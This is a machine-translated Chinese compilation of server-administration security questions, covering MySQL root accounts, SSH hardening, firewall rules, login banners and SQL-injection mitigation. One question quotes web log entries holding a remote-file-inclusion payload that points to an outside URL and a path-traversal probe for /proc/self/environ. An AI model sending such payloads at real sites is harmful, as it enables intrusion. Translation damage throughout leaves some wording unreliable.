Articles of 安全

MySQL日志显示3个root用户,2个没有密码? 为什么?

我们的MySQL日志显示警告重新启动约2个root用户没有密码。 我进入MySQL并检查所有用户: mysql> select * from mysql.user; 并看到: Host | User | Password localhost root *76685yt868itetc web12-b0 root 127.0.0.1 root 首先,为什么有3个root用户(因为我们有本地主机,所以我们需要127.0.0.1)? 其次,为什么他们两个没有设置密码? 第三,web12-b0和127.0.0.1主机是否具有完全的根访问权限,而不必使用密码(如出现)? 第四,是否有一些有效的理由,或者我应该build议pipe理员把密码放在这两台主机上? 感谢您的回答。

/ var / log / btmp是6GB,如何修剪掉?

我知道/ var / log / btmp是失败的login尝试。 通常有一个这样大的文件表示蛮力尝试。 6GB是过去三年的积累。 我已经采取措施隐藏sshd,除了我自己之外,任何人都无法访问它。 这些步骤应该大大减less此文件中的日志条目数量。 目前为止,直到这一点只是噪声机器人试图蛮力的服务器。 我的问题是,我该如何安全地清空这个文件,或者把它修剪到最后一个月? 我知道这个文件的格式不是纯文本,所以我不想破解这个文件(希望以后能够查看)。

基于IP地址的防火墙限制有多可靠?

在我需要在局域网之外访问的一些生产系统中,我有时会在边缘添加一个防火墙限制,以允许来自特定源IP地址或块的RDP通信。 当然,IP需要是静态的(或者我需要在更新的时候更新),但是我的问题是,作为防止攻击者访问这个系统的手段,这个可靠性有多高呢? 在RDP(最常见的)的情况下仍然有用户名/密码authentication,但是依靠这些基于IP的防火墙限制是一个坏主意? 我的想法最初是IP欺骗在拒绝服务方面更为有用,当你不关心数据包回到发起者身上时,但是为了获得更高的访问权限,对于攻击者来说真的很容易欺骗他的IP, 并有数据包以某种方式路由回到他的真实地址?

禁用SSH的密码login与删除所有用户的密码相同吗?

我有一个只有root用户的云服务器。 我只使用RSA密钥进行SSH连接。 为了使它更安全,我想禁用密码function。 我知道这可以通过编辑/etc/ssh/sshd_config文件并将PermitRootLogin yes更改为PermitRootLogin without-password 。 我想知道是否简单地通过passwd -d root删除root密码将是等效的(假设我不创build更多的用户或新用户也删除了他们的密码)。 一种方法是否存在任何安全问题?

在没有防火墙的情况下托pipe在公共IP上

所以我有一个有趣的问题。 我目前租用Hetzner(德国托pipe服务提供商)的几台服务器。 每个服务器都有一个软防火墙,并做一些像网页寄存/数据库。 我想租一个更强大的服务器,并使用连接到物理网卡和pfSense虚拟机的vSwitch和pfSense虚拟机中的另一个vSwitch到其他虚拟机设置ESXi等虚拟机pipe理程序。 不幸的是,Hetzner似乎没有在公共接口和服务器之间提供硬件防火墙(只留下软防火墙)。 像这样公开运行ESXi(v5.5)的安全隐患是什么? 快速研究build议spiceworks上的这个线程总结为禁用SSH /控制台(telnet?)访问和设置正确的SSL证书和一个非常复杂的不可猜测的用户名/密码对。 带有单入口攻击点的明显含义。

如何知道谁在访问我的系统?

是否有可能知道是否有人访问我的系统中的任何文件夹或驱动器(32位Windows 2003)? 我的意思是共享文件夹或非共享文件夹,任何东西。 而且一旦知道,如何拒绝对特定主机的访问。 对于共享文件夹,我知道该怎么做,但是如果有人正在访问某个文件夹,并且没有正确的凭据,我不知道该如何控制。 请忽略像洪stream等情况下,所有我想知道的是,如果有人正在以这种方式访问​​我的系统文件夹 \\10.30.188.231\d$\calvin_docs 与一些有效的用户名和密码。 我想知道正在访问的系统的ip /用户名

两个具有相同密钥的SSL证书

如果我使用相同的密钥生成两个SSL证书,我是否稀释了证书的强度? (这是否为密码分析打开了大门,或是通过该渠道泄露数据的可能性)? 谢谢

我应该使用login横幅吗?如果是,应该说什么?

交互式login横幅值得拥有? 普遍的共识是,他们是这样的,但是旗帜应该怎么说呢? 一些正在考虑的事情(没有特别的顺序): 设备的所有权 没有隐私的期望 监测可能会完成 仅授权使用 不要使用“欢迎” 如果可能的话用当地语言 横幅的长度:短而简短,长而罗嗦 不要识别设备的使用 含糊或具体

初学者安全问题

我对web开发还很陌生,并且对安全性有疑问。 我每天都看看我的CPanel中的“最新的访问者”,今天有一些奇怪的条目(一个粘贴在下面)。 不知道有什么更好的,它在我看来就像有一些网站是指用户访问我的网站,出于某种原因。 有人可以解释这些是真的吗?如果有什么需要关注的? 谢谢! Host: 77.68.38.175 /?p=http://teen-37.net/myid.jpg? Http Code: 404 Date: Feb 17 08:13:58 Http Version: HTTP/1.1 Size in Bytes: – Referer: – Agent: libwww-perl/5.805 * /?p=../../../../../../../../../../../../../../../proc/self/environ%00 Http Code: 404 Date: Feb 17 08:13:59 Http Version: HTTP/1.1 Size in Bytes: – Referer: – Agent: libwww-perl/5.805

当所有的PHP脚本都有缺陷时,我应该如何针对sql注入设置数据库保护?

我已经inheritance了一个非常不安全的PHP Web应用程序,有一个SQL注入的历史。 我不能立即修复这些脚本,而是需要他们运行才能运行网站,并且首先从php端处理php脚本过多。 不过,我确实可以完全控制服务器和服务器上的软件,包括完全控制mysql数据库及其用户。 让我们估计一下总共300个脚本,40个半私有脚本和20个私有/安全脚本。 所以我的问题是如何最好的保护数据,隐含的假设,从PHP方面的SQL注入(例如在300个脚本列表中的某处)是不可避免的? 我的第一个草案计划是在mysql数据库中创build多个不同权限的用户层。 通过这种方式,我可以确保数据和脚本最需要保护第一(“私人/安全”类别),然后是第二层数据库表和脚本(“半私人”),最后处理安全性其余的PHP应用程序总体上(最终确保数据库表,基本上处理“公共”信息,例如,甚至只是查看主页需要)的结果。 因此,3个数据库用户(公用,半专用和安全)使用不同的用户连接三组不同的脚本(安全脚本,半私有脚本和公用脚本)。 通过这种方式,我可以阻止所有对“公开”或“半私人”的“安全”访问,以及“公开”的“半私密”访问。 还有其他的select,我应该看看? 如果一个分层的接入系统是一条路,那么最好的方法是什么?